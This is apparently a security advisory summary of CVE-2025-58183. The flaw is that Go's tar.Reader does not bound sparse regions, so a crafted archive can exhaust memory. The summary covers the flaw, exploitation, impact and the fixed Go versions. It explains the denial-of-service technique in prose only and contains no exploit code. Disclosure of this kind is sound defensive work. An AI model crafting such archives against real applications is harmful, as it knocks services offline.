CVE-2025-58183

Vulnerability

The tar.Reader in Go's archive/tar package does not enforce a maximum number of sparse region data blocks in GNU tar pax 1.0 sparse files. This allows a maliciously crafted archive to contain an arbitrary large number of sparse regions, causing the reader to allocate memory proportional to the number of regions without bound.[1][3]

Exploitation

An attacker can exploit this by providing a specially crafted tar archive with a large number of sparse entries. When processed by a Go application using tar.Reader (especially when reading from a compressed source, such as a gzip stream), a small compressed input can lead to reading an unbounded amount of data into memory.[2][4] No authentication or special network position is required beyond the ability to supply the archive to the application.

Impact

The primary impact is a denial of service through memory exhaustion. An attacker can cause the application to allocate excessive memory, potentially leading to crashes or system instability. This does not result in code execution or data corruption.[1][3]

Mitigation

This vulnerability is fixed in Go versions 1.24.8 and 1.25.2. Users should update to these versions or later. There is no workaround beyond applying the patch.[2][4]